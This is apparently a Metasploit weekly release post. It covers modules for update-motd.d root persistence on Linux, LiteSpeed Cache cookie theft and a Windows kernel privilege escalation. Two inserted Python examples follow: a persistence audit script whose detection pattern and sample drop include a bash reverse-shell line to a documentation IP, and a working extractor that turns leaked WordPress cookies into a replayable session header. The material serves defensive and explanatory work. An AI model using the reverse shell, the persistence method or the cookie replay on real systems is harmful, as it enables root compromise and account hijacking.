Metasploit Weekly Wrap-Up 09/20/2024

Christopher Granleese, blog.rapid7.com, 2024-09-20 18:31:40

Tags: metasploit, linux, persistence, wordpress, litespeed, plugin, exploit, windows, kernel, lpe, cve-2024-44000, cve-2024-30088, update, features, bugs, documentation

CVSS2: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
  Attack Vector: LOCAL; Attack Complexity: LOW; Authentication: NONE; Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE

CVSS3: 7.8 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
  Attack Vector: LOCAL; Attack Complexity: LOW; Privileges Required: LOW; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

AI Score: 7.7 (Confidence: Low)

New module content (3)

update-motd.d Persistence


Author: Julien Voisin
Type: Exploit
Pull request: #19454 contributed by jvoisin
Path: linux/local/motd_persistence

Description: This adds a module that maintains persistence on a Linux target by writing a bash script into the update-motd.d directory. Scripts in that directory are executed with root privileges every time a user logs into the system through SSH, so the dropped script runs as root on each login without needing a cron entry or service.
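The defensive counterpart of the module above: an audit of an update-motd.d directory that flags freshly modified executables, executables containing shell tokens typical of droppers and reverse shells, and entries that are not regular files. This is an added example, not code from the Rapid7 post or from Metasploit; the token list, the seven-day window and the sample tree built in demo() are this example's own constructions, and the directory semantics assumed are the Debian/Ubuntu ones (pam_motd runs each executable in /etc/update-motd.d/ as root at login).

```python
# Audit an update-motd.d directory for persistence scripts of the kind the
# motd_persistence module drops. On Debian/Ubuntu, pam_motd runs every
# executable file in /etc/update-motd.d/ as root on each interactive SSH
# login, so a script dropped there is a root-level trigger that needs no
# cron entry or service.
#
# Added example, not code from the Rapid7 post or from Metasploit. The
# heuristics (token list, "recently modified" window, non-regular files)
# are this example's own choices; the sample tree in demo() is constructed.
import os
import re
import stat
import tempfile
import time

# Tokens that rarely belong in a stock MOTD script but are common in droppers
# and reverse shells. Illustrative, not exhaustive.
SUSPICIOUS = re.compile(
    r"/dev/tcp/|bash\s+-i|base64\s+(?:-d|--decode)"
    r"|(?:curl|wget)\s[^\n]*\|\s*(?:ba)?sh|nc\s+-[ec]|python3?\s+-c|eval\s",
    re.IGNORECASE,
)


def audit_update_motd(directory, now=None, max_age_days=7):
    """Return [(filename, [reasons...])] for entries worth a human look."""
    now = time.time() if now is None else now
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            # A symlink pointing out of the directory is itself worth noticing.
            findings.append((name, ["not a regular file"]))
            continue
        if not st.st_mode & stat.S_IXUSR:
            continue  # pam_motd only executes files with the execute bit set
        reasons = []
        if now - st.st_mtime < max_age_days * 86400:
            reasons.append("modified within %d days" % max_age_days)
        with open(path, "rb") as fh:
            body = fh.read().decode("utf-8", "replace")
        hits = sorted({m.group(0).strip() for m in SUSPICIOUS.finditer(body)})
        if hits:
            reasons.append("suspicious tokens: " + ", ".join(hits))
        if reasons:
            findings.append((name, reasons))
    return findings


def demo():
    """Build a constructed update-motd.d tree and audit it with a fixed clock."""
    now = 1_700_000_000
    old = now - 90 * 86400
    d = tempfile.mkdtemp(prefix="update-motd.d-")

    def put(name, text, mtime, mode=0o755):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write(text)
        os.chmod(p, mode)
        os.utime(p, (mtime, mtime))

    # Stock-looking entries: old and benign.
    put("00-header", "#!/bin/sh\nprintf 'Welcome to %s\\n' \"$(uname -o)\"\n", old)
    put("50-landscape-sysinfo", "#!/bin/sh\n/usr/bin/landscape-sysinfo\n", old)
    # Constructed attacker drop: fresh, and opens a reverse shell as root on
    # every login. The address is a documentation (TEST-NET-1) IP.
    put("99-motd-update", "#!/bin/bash\nbash -i >& /dev/tcp/192.0.2.10/4444 0>&1 &\n", now - 3600)
    # Non-executable file: pam_motd ignores it, so the audit does too.
    put("README", "Scripts here are run by pam_motd.\n", old, mode=0o644)
    return audit_update_motd(d, now=now)


if __name__ == "__main__":
    for name, reasons in demo():
        print("%-24s %s" % (name, "; ".join(reasons)))
```

On a real host, call audit_update_motd("/etc/update-motd.d") and pair the output with a package-ownership check (dpkg -S on each flagged file) before deciding anything; the token list is a triage aid, not a verdict.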

WordPress LiteSpeed Cache plugin cookie theft

Authors: Rafie Muhammad and jheysel-r7
Type: Exploit
Pull request: #19457 contributed by jheysel-r7
Path: multi/http/wp_litespeed_cookie_theft
AttackerKB reference: CVE-2024-44000

Description: This adds an exploit module for the WordPress LiteSpeed Cache plugin (CVE-2024-44000). On vulnerable plugin versions with Debug Logs enabled, the authentication cookies of logged-in users are leaked into the plugin's debug log. The module reads the leaked cookies and uses them to upload and execute a plugin that spawns a Meterpreter session.
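What the module's first stage amounts to, as an added example (not the Rapid7 post's or the Metasploit module's code): pull WordPress authentication cookies out of a debug log, decode them, and keep only the ones that have not expired. The log lines in SAMPLE_LOG are constructed for this example and only approximate the plugin's real layout, so the extractor keys on the Cookie and Set-Cookie header names rather than on line format; the cookie naming (wordpress_logged_in_<md5 of siteurl>) and the value layout (user|expiry|session token|hmac, with | URL-encoded) are WordPress's own.

```python
# Pull WordPress authentication cookies out of a LiteSpeed Cache debug log,
# the leak CVE-2024-44000 turns into account takeover, and show which of
# them are still replayable. Added example, not the Rapid7 post's or the
# Metasploit module's code. SAMPLE_LOG is constructed and only approximates
# the plugin's real log layout, so matching keys on the header names.
import re
import time
from urllib.parse import unquote

# WordPress auth cookies are named wordpress_<md5(siteurl)>,
# wordpress_sec_<md5> and wordpress_logged_in_<md5>; the value is
# "user|expiry|session_token|hmac" with "|" URL-encoded as %7C.
AUTH_COOKIE = re.compile(r"\b(wordpress_(?:sec_|logged_in_)?[0-9a-f]{32})=([^;,\s]+)")
HEADER = re.compile(r"\b(Set-Cookie|Cookie):", re.IGNORECASE)

SAMPLE_LOG = """\
09/05/24 10:12:03.101 [203.0.113.5:51234 1 HTTP/1.1 GET /wp-login.php] Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/
09/05/24 10:12:05.417 [203.0.113.5:51234 1 HTTP/1.1 POST /wp-login.php] Set-Cookie: wordpress_logged_in_3f0d1a2b4c5d6e7f8091a2b3c4d5e6f7=admin%7C1725710000%7Cdeadbeefcafe%7C0123456789abcdef; path=/; HttpOnly
09/05/24 10:12:09.002 [203.0.113.5:51234 1 HTTP/1.1 GET /wp-admin/] Cookie: wordpress_logged_in_3f0d1a2b4c5d6e7f8091a2b3c4d5e6f7=admin%7C1725710000%7Cdeadbeefcafe%7C0123456789abcdef; wp-settings-time-1=1725000000
09/05/24 10:13:44.900 [198.51.100.7:40022 1 HTTP/1.1 GET /] X-LiteSpeed-Cache: hit
"""


def parse_wp_auth_cookie(value):
    """Split a WordPress auth cookie value into its fields, or None if malformed."""
    parts = unquote(value).split("|")
    if len(parts) != 4 or not parts[1].isdigit():
        return None
    user, expiry, token, mac = parts
    return {"user": user, "expires": int(expiry), "token": token, "hmac": mac}


def extract_leaked_cookies(log_text):
    """Every WordPress auth cookie found on a Cookie/Set-Cookie header line."""
    leaks = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        h = HEADER.search(line)
        if not h:
            continue
        for name, value in AUTH_COOKIE.findall(line):
            leaks.append({
                "line": lineno,
                "header": h.group(1).title(),  # "Set-Cookie" or "Cookie"
                "name": name,
                "value": value,
                "parsed": parse_wp_auth_cookie(value),
            })
    return leaks


def reusable_cookies(leaks, now=None):
    """Leaked cookies that have not expired: the ones that can be replayed
    as a Cookie header to act as that user (what the msf module does next)."""
    now = time.time() if now is None else now
    usable = {}
    for leak in leaks:
        p = leak["parsed"]
        if p and p["expires"] > now:
            usable[leak["name"]] = leak["value"]
    return usable


def cookie_header(cookies):
    """Render cookies as the single Cookie request header used when replaying them."""
    return "; ".join("%s=%s" % kv for kv in cookies.items())


if __name__ == "__main__":
    found = extract_leaked_cookies(SAMPLE_LOG)
    for leak in found:
        print("line %d %-10s %s -> user=%s expires=%d" % (
            leak["line"], leak["header"], leak["name"],
            leak["parsed"]["user"], leak["parsed"]["expires"]))
    print("Cookie:", cookie_header(reusable_cookies(found, now=1725700000)))
```

The check a defender wants from this is the inverse: run the extractor over your own wp-content/debug.log, and if anything comes back, treat those sessions as compromised, rotate them (changing the user's password invalidates the session token), confirm the plugin's debug logging is off, and make sure the log file is not reachable over HTTP.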

Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes

Authors: jheysel-r7 and tykawaii98
Type: Exploit
Pull request: #19345 contributed by jheysel-r7
Path: windows/local/cve_2024_30088_authz_basep
AttackerKB reference: CVE-2024-30088

Description: This adds a Windows local privilege escalation (LPE) exploit module for CVE-2024-30088, a time-of-check/time-of-use race in the kernel's AuthzBasepCopyoutInternalSecurityAttributes. Run from an existing Meterpreter session, it opens a second session running as NT AUTHORITY\SYSTEM.

Enhancements and features (3)

  • #19414 from cdelafuente-r7 - Adds some missing constants for the Kerberos LoginScanner as defined in the documentation. This also defines the default connection_timeout value in #set_sane_defaults.
  • #19443 from jvoisin - Removes some redundant code from lib/msf/core/payload/php.rb.
  • #19445 from jvoisin - Makes minor improvements to lib/msf/core/payload/php.rb.

Bugs fixed (1)

  • #19449 from zeroSteiner - This fixes an issue in the exploit for CVE-2022-0995 where it would crash with an exception while printing the message explaining why it had failed.

Documentation added (1)

  • #19452 from zeroSteiner - This improves Metasploit's documentation on how to set up a Meterpreter handler behind ngrok port forwarding.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub.

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.
